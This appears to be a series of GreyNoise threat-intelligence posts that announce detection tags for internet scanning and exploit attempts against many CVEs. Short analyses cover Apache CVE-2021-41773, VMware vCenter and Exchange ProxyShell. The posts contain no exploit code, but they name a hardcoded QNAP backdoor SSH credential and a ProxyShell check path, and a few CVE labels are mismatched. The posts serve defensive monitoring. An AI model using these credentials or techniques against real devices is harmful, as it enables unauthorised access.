• This IP address has been observed attempting to exploit CVE-2021-20034, an arbitrary file deletion vulnerability that allows performing a factory reset on SonicWall SMA100 devices.
• Sources: Exploit DB, Attacker KB
• See it on GreyNoise Viz

SonicWall SSL-VPN RCE Attempt  [Intention: Malicious]

• This IP address has been observed attempting to exploit a remote command execution vulnerability in SonicWall SSL-VPN.
• Sources: Darren Martyn (GitHub)
• See it on GreyNoise Viz

Legacy Web Server RCE Attempt [Intention: Malicious]

• CVE-2009-4487, CVE-2009-4488, CVE-2009-4489, CVE-2009-4490, CVE-2009-4491, CVE-2009-4492, CVE-2009-4493, CVE-2009-4494, CVE-2009-4495, CVE-2009-4496
• This IP address has been observed attempting to exploit a command injection vulnerability found in the old versions of several web servers.
• Sources: ush.it
• See it on GreyNoise Viz

D-Link DIR-825 R1 RCE Attempt [Intention: Malicious]

• CVE-2020-29557
• This IP address has been observed attempting to exploit CVE-2020-29557, a remote command execution vulnerability in D-Link DIR-825 R1 devices.
• Sources: Shaked Delarea, NIST
• See it on GreyNoise Viz

D-Link DNS-320 RCE Attempt [Intention: Malicious]

• CVE-2020-25506
• This IP address has been observed attempting to exploit CVE-2020-25506, a remote command execution vulnerability in D-Link DNS-320 devices.
• Sources: NIST, GitHub
• See it on GreyNoise Viz

Micro Focus OBR RCE Attempt [Intention: Malicious]

• CVE-2021-22502
• This IP address has been observed attempting to exploit CVE-2021-22502, a remote command execution vulnerability in Micro Focus Operation Bridge Reporter software.
• Sources: NIST, GitHub
• See it on GreyNoise Viz

Yealink Device Management RCE Attempt [Intention: Malicious]

• CVE-2021-27561
• This IP address has been observed attempting to exploit CVE-2021-27561, a remote command execution vulnerability in Yealink Device Management Platform.
• Sources: NIST,  SSD Disclosure
• See it on GreyNoise Viz

Path Traversal and Remote Code Execution in Apache HTTP Server, CVE-2021-41773

On October 4th, 2021, Apache disclosed a path traversal vulnerability CVE-2021-41773 that affects HTTP Server version 2.4.49. The vulnerability was introduced in this version (2.4.49) and is patched in version 2.4.50.

This path traversal vulnerability allows sensitive files outside of the expected document root to be accessed, such as configuration files and Common Gateway Interface (CGI) scripts. This allows for specially crafted requests to read arbitrary files as well as perform Remote Code Execution (RCE) on systems that have the Apache “mod_cgi” module enabled.

On October 3rd, 2021, at 08:44 UTC, GreyNoise observed the first scan for this vulnerability from 36.68.53.196. This predates the mailing list announcement from Apache on October 5th as well as the release of 2.4.50 on October 4th, but after the patch was committed on September 29th. [View 36.68.53.196 in GreyNoise]

As of October 5th, 2021, the first Proof of Concept (POC) code became available which demonstrated arbitrary file read. It was closely followed by a POC demonstrating RCE.

GreyNoise Tag for CVE-2021-41773

GreyNoise has released the following tag to enable monitoring of relevant activity:

• Apache HTTP Server Path Traversal Attempt: The vulnerability attempt tag for CVE-2021-41773, path traversal vulnerability in Apache HTTP Server v2.4.49 which can lead to arbitrary file read and remote code execution. [View In GreyNoise]*

As of 7-Oct-21, GreyNoise is seeing 47 unique IP addresses that have scanned for this vulnerability, 39 of which are “malicious” and 8 of which are “benign."

* Editor’s Note: If this tag returns “No results found’,' this means that GreyNoise has not observed any IP addresses scanning the internet for this CVE in the past 90 days. You can use GreyNoise to notify you if this changes by using our Alerts feature.

10/15/21: This blog has been updated with Figure 1 to depict the timeline of events.

New Tags

Azure OMI RCE Attempt  [Intention: Malicious]

• CVE-2021-38647, CVE-2021-38648, CVE-2021-38645, CVE-2021-38649
• This IP address has been observed scanning the internet for WSMan Powershell providers without an Authorization header, a root RCE in Azure Open Management Infrastructure.
• Sources: Wiz, Microsoft Security Response Center [1, 2, 3, 4]
• See it on GreyNoise Viz

Azure OMI RCE Check [Intention: Unknown]

• CVE-2021-38647, CVE-2021-38648, CVE-2021-38645, CVE-2021-38649
• This IP address has been observed scanning the internet for WSMan Powershell providers without an Authorization header, but has not provided a valid SOAP XML Envelope payload.
• Sources: Wiz, Microsoft Security Response Center [1, 2, 3, 4]
• See it on GreyNoise Viz

VMWare VCSA File Upload Attempt  [Intention: Malicious]

• CVE-2021-22005, CVE-2021-22017
• This IP address has been observed attempting to exploit a remote file upload vulnerability in VMWare vCenter Server Appliance.
• Sources: VMware [1, 2], MITRE [1, 2]
• See it on GreyNoise Viz

VMWare VCSA File Upload Check [Intention: Unknown]

• CVE-2021-22005, CVE-2021-22017
• This IP address has been observed checking for the presence of a remote file upload vulnerability in VMWare vCenter Server Appliance.
• Sources: VMware [1, 2], MITRE [1, 2]
• See it on GreyNoise Viz

LDAP Crawler [Intention: Unknown]

• This IP address has been observed crawling the internet and attempting to discover hosts that respond to LDAP SearchRequest messages.
• Sources: IETF, ldap.com, LDAP Wiki
• See it on GreyNoise Viz

Veeder-Root ATGs Crawler [Intention: Unknown]

• This IP address has been observed attempting to discover Veeder-Root Automatic Oil Tank Gauges.
• Sources: Rapid7 [1, 2], Veeder
• See it on GreyNoise Viz

VMware vCenter File Disclosure [Intention: Malicious]

• This IP address has been observed attempting to exploit an arbitrary file disclosure vulnerability in VMware vCenter.
• Sources: GitHub, PT Swarm
• See it on GreyNoise Viz

PJL Crawler [Intention: Unknown]

• This IP address has been observed sending Printer Job Language commands.
• Sources: Tenable, HP Developers Portal
• See it on GreyNoise Viz

PowerShell Generic Shell Attempt [Intention: Malicious]

• This IP address has been observed attempting to spawn a generic PowerShell reverse or bind shell using the web request.
• Sources: GitHub
• See it on GreyNoise Viz

Cisco IMC Supervisor and UCS Director Backdoor [Intention: Malicious]

• CVE-2019-1935
• This IP address has been observed attempting to authenticate via SSH using default credentials for Cisco IMC Supervisor and Cisco UCS Director products.
• Sources: NIST
• See it on GreyNoise Viz

On September 21, 2021, VMWare published an advisory for several vulnerabilities. This included, most notably, CVE-2021-22005, which affects their vCenter Server product. This vulnerability is an arbitrary file upload vulnerability that can lead to remote code execution (RCE) via upload of a specially crafted file. This works regardless of the configuration settings of vCenter Server.

Due to the severity of this vulnerability, VMWare published workaround instructions detailing how to manually or automatically patch the affected products. The automated patching script (available in the right-hand panel in the link above) includes logic to validate if your product is vulnerable to CVE-2021-22005, as well as confirm the patch has worked as expected.

As of September 23, 2021, there is no known publicly available proof-of-concept (PoC) code for the CVE that enables arbitrary file upload or RCE. However, GreyNoise is observing a significant number of checks for vulnerable instances of vCenter Server based off of the automated patching script provided by VMWare, most of these egressing via Tor.

The following tags have been released to enable monitoring of relevant activity:

• VMWare VCSA File Upload Check: The vulnerability check tag for CVE-2021-22005 matches on actively utilized variations based off of VMWare’s patching script, typically sending invalid JSON or an empty JSON object to vulnerable endpoints. [View In GreyNoise]
• VMWare VCSA File Upload Attempt: The vulnerability attempt tag for CVE-2021-22005 matches on activity to vulnerable endpoints containing valid, parsable, or non-empty payloads. [View In GreyNoise]

Editor's Note: If either of these tags return "no results," this means that we have not observed any recent activity. You can be notified if this changes by using our Alerts feature.

‍

New Tags

MongoDB Crawler  [Intention: Unknown]

• This IP address has been observed crawling the Internet and attempting to discover MongoDB instances.
• Sources: MongoDB Docs, RAPID7
• See it on GreyNoise Viz

Apple iOS Lockdownd Crawler [Intention: Unknown]

• This IP address has been observed attempting to discover legacy Apple iOS devices with remotely accessible lockdownd service.
• Sources: iPhone Wiki, Zdziarski's Blog, GitHub, Apple Support
• See it on GreyNoise Viz

HTTP Request Smuggling [Intention: Malicious]

• This IP address has been observed attempting to smuggle HTTP requests, a method commonly used to bypass load balancer or proxy security restrictions.
• Sources: PortSwigger, JFrog
• See it on GreyNoise Viz

Gh0st RAT Crawler  [Intention: Malicious]

• This IP address has been observed checking for the existence of hosts infected with Gh0st trojan.
• Sources: RSA Community, norman.no
• See it on GreyNoise Viz

nJRAT Crawler  [Intention: Malicious]

• This IP address has been observed sending unobfuscated njRAT traffic.
• Sources: RSA Community, Krebs On Security
• See it on GreyNoise Viz

Supervisor XML-RCE Attempt  [Intention: Malicious]

• This IP address has been observed attempting to exploit CVE-2017-11610, a remote command execution vulnerability in Supervisor client/server.
• Sources: NIST, Supervisor
• See it on GreyNoise Viz

New Actor Tag

BLEXbot [Intention: Benign]

• Sources: WebMeUp
• See it on GreyNoise Viz

New Tags

Atlassian Confluence Server OGNL Injection Attempt [Intention: Malicious]

• CVE-2021-26084
• This IP address has been observed attempting to exploit CVE-2021-26084, an OGNL injection vulnerability in Confluence Server and Data Center.
• Sources: GitHub (1, 2), MITRE
• See it on GreyNoise Viz

Atlassian Confluence Server OGNL Injection Vuln Check [Intention: Unknown]

• CVE-2021-26084
• This IP address has been observed checking for the existence of CVE-2021-26084, an OGNL injection vulnerability in Confluence Server and Data Center.
• Sources: GitHub (1, 2), MITRE
• See it on GreyNoise Viz

Oracle WebLogic RCE CVE-2021-2109 [Intention: Malicious]

• CVE-2021-2109
• This IP address has been observed exploiting Oracle WebLogic CVE-2021-2109.
• Sources: Mitre, PacketStorm Security, GitHub
• See it on GreyNoise Viz

Seagate BlackArmor RCE Attempt [Intention: Malicious]

• CVE-2014-3206
• This IP address has been observed exploiting CVE-2014-3206, a remote code execution vulnerability in Seagate BlackArmor NAS.
• Sources: NIST, VulDB, ExploitDB
• See it on GreyNoise Viz

ASUS GT-AC2900 Auth Bypass Attempt [Intention: Malicious]

• CVE-2021-32030
• This IP address has been observed attempting to exploit CVE-2021-32030, an authentication bypass in ASUS GT-AC2900 routers.
• Sources: MITRE, Atredis
• See it on GreyNoise Viz

Apache SkyWalking GraphQL SQL Injection  [Intention: Malicious]

• CVE-2020-9483
• This IP address has been observed attempting to exploit CVE-2020-9483, a SQL injection vulnerability in Apache SkyWalking via GraphQL.
• Sources: GitHub, NVD
• See it on GreyNoise Viz

Carries HTTP Referer [Intention: Unknown]

• This IP address has been observed scanning the internet with an HTTP client that includes the Referer header in its requests.
• Sources: Firefox
• See it on GreyNoise Viz

Stores HTTP Cookies  [Intention: Unknown]

• This IP address has been observed scanning the internet with an HTTP client that supports storing Cookies.
• Sources: Firefox (1, 2)
• See it on GreyNoise Viz

Follows HTTP Redirects  [Intention: Unknown]

• This IP address has been observed scanning the internet with an HTTP client that follows redirects defined in a Location header.
• Sources: Firefox
• See it on GreyNoise Viz

RSYNC Crawler  [Intention: Unknown]

• This IP address has been observed scanning the internet and attempting to discover rsync server instances.
• Sources: Red Hat, Hacktricks.xyz
• See it on GreyNoise Viz

New Actor Tag

University of Michigan [Intention: Benign]

• Sources: Department of Electrical Engineering and Computer Science
• See it on GreyNoise Viz

Tag Improvements

As part of our process, our research team continues to clean up and improve on existing tags as new information or better processes are introduced.

ADB Check [Intention: Unknown]

• This IP address has been observed checking for the existence of the Android Debug Bridge protocol.
• See it on GreyNoise Viz

ADB Attempt [Intention: Malicious]

• This IP address has been observed checking for the existence of the Android Debug Bridge protocol and has requested interactivity.
• See it on GreyNoise Viz

EDITORS NOTE: This blog post has been updated as of Sep. 2 to reflect edits to the Atlassian Confluence Server OGNL Injection tags.

New Tags

Tag: Exchange ProxyShell Vuln Attempt [Intention: Malicious]

• CVE-2021-34473, CVE-2021-34523, CVE-2021-31207
• This IP address has been observed attempting to exploit the ProxyShell vulnerability in Microsoft Exchange.
• Sources: Medium, BlackHat, y4y.space
• See it on GreyNoise Viz

Tag: Exchange ProxyShell Vuln Check [Intention: Unknown]

• CVE-2021-34473, CVE-2021-34523, CVE-2021-31207
• This IP address has been observed checking for the existence of the ProxyShell vulnerability in Microsoft Exchange, an activity which commonly leaks sensitive information.
• Sources: Medium, BlackHat, y4y.space
• See it on GreyNoise Viz

Tag: Javascript Enabled [Intention: Unknown]

• This IP address has been observed scanning the internet with a client that supports javascript, such as a web browser controlled through automation.
• See it on GreyNoise Viz

Tag: Aerospike RCE Attempt [Intention: Malicious]

• CVE-2020-13151
• This IP address has been observed attempting to exploit CVE-2020-13151, a remote command execution in Aerospike databases.
• Sources: NIST, GitHub [1, 2]
• See it on GreyNoise Viz

Tag: Docker API Container Creation Attempt [Intention: Malicious]

• This IP address has been observed attempting to provision a container using the Docker API.
• Sources: Docker Docs
• See it on GreyNoise Viz

Tag: Buffalo Router RCE Check [Intention: Unknown]

• CVE-2021-20091
• This IP address has been observed attempting to discover Buffalo routers susceptible to remote command injection through path traversal.
• Sources: Tenable, MITRE
• See it on GreyNoise Viz

Tag: Buffalo Router RCE Attempt [Intention: Malicious]

• CVE-2021-20091
• This IP address has been observed attempting to exploit Buffalo routers susceptible to remote command injection through path traversal.
• Sources: Tenable, MITRE
• See it on GreyNoise Viz

Tag: FirebirdSQL Crawler [Intention: Unknown]

• This IP address has been observed crawling the Internet and attempting to discover FirebirdSQL instances.
• Sources: GitHub, Nmap Service Probes
• See it on GreyNoise Viz

Tag: Ruijie EG Command Injection Attempt [Intention: Malicious]

• This IP address has been observed attempting command injection on Ruijie network devices with Easy Gateway support.
• Sources: peiqi.tech
• See it on GreyNoise Viz

Recent Actor Tag

• Cortex® Xpanse™ [Intention: Benign]

• Sources: Palo Alto Networks, Expanse, ARIN
• See it on GreyNoise Viz

Tag Improvements

As part of our process, our research team continues to clean up and improve on existing tags as new information or better processes are introduced.

Tag: X Server Connection Attempt [Intention: Malicious]

• This IP address has been observed scanning the Internet for X11 servers with access control disabled, which allows for unauthenticated connections.
• See it on GreyNoise Viz

Tag: ADB Worm [Intention: Malicious]

• This IP address has been observed exploiting the Android Debug Bridge vulnerability.
• See it on GreyNoise Viz

Removed Tags

• Stretchoid
• Security Scorecard

During BlackHat 2021, security researcher Orange Tsai demonstrated a proof-of-concept exploit for Microsoft Exchange vulnerabilities, including a Pre-auth Path Confusion leading to Access-Control List (ACL) bypass (tracked as CVE-2021-34473, also called ProxyShell). Since Tsai’s talk, multiple researchers have published write-ups about the vulnerabilities [1, 2]. GreyNoise had not observed any mass scanning activity until Aug. 9, and has seen a significant uptick in scanning as of Thursday, Aug. 12. GreyNoise has created two tags to track activity related to these vulnerabilities.

Exchange ProxyShell Vuln Check: The vulnerability check for CVE-2021-34473 has several public variations. These include checking for access to /mapi/nspi which results in exposure of potentially sensitive information such as Version, User, UPN, SID, and Organization. Out of caution, GreyNoise tags this as malicious intent despite being a Vuln Check. [View In GreyNoise]

Exchange ProxyShell Vuln Attempt: Active attempts that leverage and chain the Pre-Auth Path Confusion for further exploitation through Elevation of Privilege on Exchange PowerShell Backend (CVE-2021-34523) or Post-auth Arbitrary-File-Write leading to remote code execution (CVE-2021-31207) are included in this tag. [View In GreyNoise]

Editor's Note: If either of these tags, or any tags for that matter, return "no results," this means that we have not observed any recent activity. You can be notified if this changes by using our Alerts feature.

New Tags

CVE-2009-0545, CVE-2019-12725, CVE-2020-29390

Tag: Zeroshell RCE Attempt [Intention: Malicious]

• This IP address has been observed attempting to exploit a remote command execution vulnerability in Zeroshell.
• Sources: NIST [1, 2, 3]
• See it on GreyNoise Viz

Tag: Cisco Smart Install RCE Attempt [Intention: Malicious]

• This IP address has been observed attempting to exploit Cisco Smart Install Protocol.
• Sources: Rapid7, GitHub [1, 2]
• See it on GreyNoise Viz

CVE-2021-35464

Tag: ForgeRock OpenAM Pre-Auth RCE Vuln Check [Intention: Unknown]

• This IP address has been observed checking for the existence of CVE-2021-35464, a path traversal vulnerability in ForgeRock OpenAM which can lead to RCE.
• Sources: PortSwigger, NIST
• See it on GreyNoise Viz

CVE-2021-35464

Tag: ForgeRock OpenAM Pre-Auth RCE Attempt [Intention: Malicious]

• This IP address has been observed attempting to exploit CVE-2021-35464, a path traversal vulnerability in ForgeRock OpenAM that can lead to RCE.
• Sources: PortSwigger, NIST
• See it on GreyNoise Viz

CVE-2021-33544 to CVE-2021-33544 (11 CVEs)

Tag: UDP Technology IP Camera Attempt [Intention: Malicious]

• This IP address has been observed attempting to exploit CVEs in UDP Technology camera firmware and has attempted exploitation.
• Sources: PortSwigger, Randorisec
• See it on GreyNoise Viz

CVE-2021-33544, CVE-2021-33548, CVE-2021-33550 to CVE-2021-33554

Tag: UDP Technology IP Camera Check [Intention: Unknown]

• This IP address has been observed attempting to exploit CVEs in UDP Technology camera firmware and has attempted exploitation.
• Sources: PortSwigger, Randorisec
• See it on GreyNoise Viz

CVE-2017-12149

Tag: Jboss Application Server RCE Attempt [Intention: Malicious]

• This IP address has been observed attempting to exploit CVE-2017-12149, a remote code execution vulnerability in JBoss Application Server.
• Sources: NIST, GitHub
• See it on GreyNoise Viz

CVE-2021-30497

Tag: Ivanti Avalanche Path Traversal [Intention: Malicious]

• This IP address has been observed attempting to use CVE-2021-30497, a path traversal vulnerability in Ivanti Avalanche that could lead to arbitrary file retrieval.
• Sources:  Ivanti, SSD Disclosure
• See it on GreyNoise Viz

Tag: Double URL Encoding [Intention: Malicious]

• This IP address has been observed requesting double encoded URLs, a method commonly used for bypassing defensive rules and directory traversal.
• Sources:  OWASP, Imperva
• See it on GreyNoise Viz

Tag: Apache OFBiz Deserialization RCE [Intention: Malicious]

• This IP address has been observed attempting to exploit CVE-2021-29200, a deserialization vulnerability in Apache OFBiz 17.12.07 and earlier that can lead to unauthenticated RCE.
• Sources:  NIST, xz.aliyun.com
• See it on GreyNoise Viz

Removed Tags

These tags have been removed because they no longer exist, scan, and/or can no longer be accurately identified

• RDP Bruteforcer
• Windows RDP Cookie Hijacker
• RDP Scanner

Multiple RDP tags have been deprecated in favor of RDP Crawler, which more accurately accounts for much of the behavior we see. We are currently working to create more accurate and narrowly scoped tags for RDP scanning and exploitation.

The RDP Bruteforcer tag was created around the same time as BlueKeep and aggressively assigned `malicious` intent to basic RDP connection attempts. After re-evaluating this, we feel this was incorrect and have taken actions to improve our RDP tags in general.

Tag Improvements

As part of our process, our research team continues to clean up and improve on existing tags as new information or better processes are introduced.

Tag: Cisco Smart Install Endpoint Scanner [Intention: Unknown]

• This IP address has been seen scanning for exposed Cisco Smart Install Protocol ports.
• Sources:  Rapid7, GitHub [1, 2]
• See it on GreyNoise Viz

Tag: Linksys E-Series TheMoon Worm [Intention: Malicious]

• This IP address has been observed attempting to leverage the Linksys E-Series TheMoon command injection exploit.
• Sources:  Computerworld, SANS, GitHub
• See it on GreyNoise Viz

Integrations

Anomali: Now supports RIOT and the Community API.

New Tags

CVE-2020-36289

Tag: Jira User Enumeration Attempt [Intention: Unknown]

• This IP address has been observed attempting to use CVE-2020-36289 vulnerability and enumerate Jira users.
• Sources: NIST, Twitter
• See it on GreyNoise Viz

CVE-2021-1497, CVE-2021-1498

Tag: Cisco HyperFlex HX RCE Attempt [Intention: Malicious]

• This IP has been observed attempting to exploit CVE-2021-1497 and CVE-2021-1498, remote code execution vulnerabilities in Cisco HyperFlex HX Data Platform.
• Sources: MITRE [1, 2], Packet Storm Security, Zero Day Initiative
• See it on GreyNoise Viz

CVE-2021-1497, CVE-2021-1498

Tag: Cisco HyperFlex HX RCE Vuln Check [Intention: Unknown]

• This IP has been observed checking for the existence of CVE-2021-1497 and CVE-2021-1498, remote code execution vulnerabilities in Cisco HyperFlex HX Data Platform.
• Sources: MITRE [1, 2], Packet Storm Security, Zero Day Initiative
• See it on GreyNoise Viz

CVE-2020-35846, CVE-2020-35847, CVE-2020-35848

Cockpit CMS Command Injection [Intention: Malicious]

• This IP address has been observed attempting to exploit NoSQL command injection in Cockpit CMS.
• Sources: PT SWARM, NIST [1, 2, 3]
• See it on GreyNoise Viz

Recent Actor Tag

• CISA [Intention: Benign]

• Sources: CISA [1, 2], GitHub
• See it on GreyNoise Viz

Removed Tags

These tags have been removed because they no longer exist, scan, and/or can no longer be accurately identified

• ZeroShell RCE CVE-2009-0545

New Tags

CVE-2020-25494

Tag: SCO OpenServer RCE Attempt [Intention: Malicious]

• This IP address has been observed attempting to exploit CVE-2020-25494, a remote command execution vulnerability in SCO OpenServer.
• Sources: NIST, Packet Storm Security
• See it on GreyNoise Viz

CVE-2021-22911

Tag: Rocket.Chat server RCE Attempt [Intention: Malicious]

• This IP address has been observed attempting to exploit CVE-2021-22911, a remote command execution vulnerability in Rocket.Chat server.
• Sources: NIST, @CsEnox (GitHub )
• See it on GreyNoise Viz

Tag: Vesta Control Panel RCE Attempt [Intention: Malicious]

• This IP address has been observed attempting to exploit a remote command execution vulnerability in Vesta Control Panel.
• Sources: ExploitDB, Cisco Talos
• See it on GreyNoise Viz

CVE-2021-27144/46 | CVE-2021-27148/55 | CVE-2021-27158/59 | CVE-2021-27162/66 | CVE-2021-27168/69 | CVE-2021-27172

Tag: FiberHome Telnet Backdoor [Intention: Malicious]

• This IP address has been observed attempting to authenticate via telnet using one of several known backdoor accounts in FiberHome routers.
• Sources: Pierre Kim
• See it on GreyNoise Viz

Tag: LokiBot C2 Crawler [Intention: Unknown]

• This IP address has been observed crawling the Internet and attempting to discover LokiBot C2 nodes.
• Sources: CISA
• See it on GreyNoise Viz

Tag: Aerospike Crawler [Intention: Unknown]

• This IP address has been observed crawling for insecure Aerospike databases.
• Sources: GitHub [1, 2]
• See it on GreyNoise Viz

Recent Actor Tag

• ESET  [Intention: Benign]

• Sources: ESET [1, 2]
• See it on GreyNoise Viz

Tag Improvements

As part of our process, our research team continues to clean up and improve on existing tags as new information or better processes are introduced.

Tag: Tomcat Manager Scanner [Intention: Unknown]

• This IP address has been observed scanning the Internet for exposed Tomcat Manager instances.
• Source: Ethicaltechsupport
• See it on GreyNoise Viz

New Tags

CVE-2021-21985

Tag: Vmware vSphere Client RCE Attempt [Intention: Malicious]

• This IP address has been observed sending requests that exploit CVE-2021-21985, a remote code execution vulnerability in VMware Sphere Client.
• Sources: VMware, NIST, AttackerKB, @alt3kx (GitHub PoC)
• See it on GreyNoise Viz

Tag: VMware vSphere Client RCE Vuln Check [Intention: Unknown]

• This IP has been observed checking for the existence of CVE-2021-21985, a remote code execution vulnerability in VMware Sphere Client.
• Sources: VMware, NIST, AttackerKB, @wvu (Twitter)
• See it on GreyNoise Viz

CVE-2021-28799

Tag: VMware ESXi OpenSLP RCE Attempt [Intention: Malicious]

• This IP address has been observed attempting to exploit CVE-2021-21974, a heap overflow vulnerability in VMware ESXi OpenSLP that can lead to remote code execution.
• Source: VMware, Zero Day Initiative, @straight_blast (Medium, GitHub PoC)
• See it on GreyNoise Viz

Tag Improvements

As part of our process, our research team continues to clean up and improve on existing tags as new information or better processes are introduced.

Tag: Elasticsearch RCE Attempt [Intention: Malicious]

• This IP address has been observed sending requests that exploit CVE-2015-1427, an Elasticsearch code injection vulnerability.
• Sources: NIST, PoC Blog, GitHub
• See it on GreyNoise Viz

Recent Actor Tag

• Cyber Casa [Intention: Benign]‍
• Sources: CyberCasa‍
• See it on GreyNoise Viz

Removed Tags

These tags have been removed because they no longer exist, scan, and/or can no longer be accurately identified

• Swedish Defense Research Agency (FOI)
• Elasticsearch Worm

New Tags

CVE-2021-26912 | CVE-2021-26913 | CVE-2021-26914 | CVE-2021-26915

Tag: NetMotion Mobility Server RCE Attempt [Intention: Malicious]

• This IP address has been observed attempting to exploit a deserialization vulnerability in NetMotion Mobility Server that can lead to remote code execution.
• Sources: NIST [1, 2 , 3, 4], SSD Disclosure
• See it on GreyNoise Viz

CVE-2021-21402

Tag: Jellyfin File Disclosure [Intention: Malicious]

• This IP address has been observed attempting to use CVE-2021-21402, an arbitrary file disclosure vulnerability in Jellyfin media server.
• Source: GitHub SecurityLab
• See it on GreyNoise Viz

CVE-2021-28799

Tag: QNAP walter SSH Backdoor Attempt [Intention: Malicious]

• This IP address has been observed attempting to connect using the username and password 'walter,' which are hardcoded backdoor SSH credentials that exist in some QNAP devices.
• Source: QNAP, QNAP Forum
• See it on GreyNoise Viz

CVE-2021-30461

Tag: VoIPmonitor Unauthenticated RCE Attempt  [Intention: Malicious]

• This IP address has been observed attempting to exploit CVE-2021-30461, an unauthenticated command execution vulnerability in VoIPmonitor software.
• Source: NIST, SSD Disclosure
• See it on GreyNoise Viz

Tag Improvements

As part of our process, our research team continues to clean up and improve on existing tags as new information or better processes are introduced.

Tag: RDP Bruteforcer [Intention: Malicious]

• This IP address has been observed attempting to brute-force Microsoft Remote Desktop credentials.
• Source: Microsoft [1, 2]
• See it on GreyNoise Viz

Recent Integrations

Rapid 7 InsightConnect: Supports Enterprise API and Community API access.

CORTEX XSOAR: Supports Enterprise API and Community API access.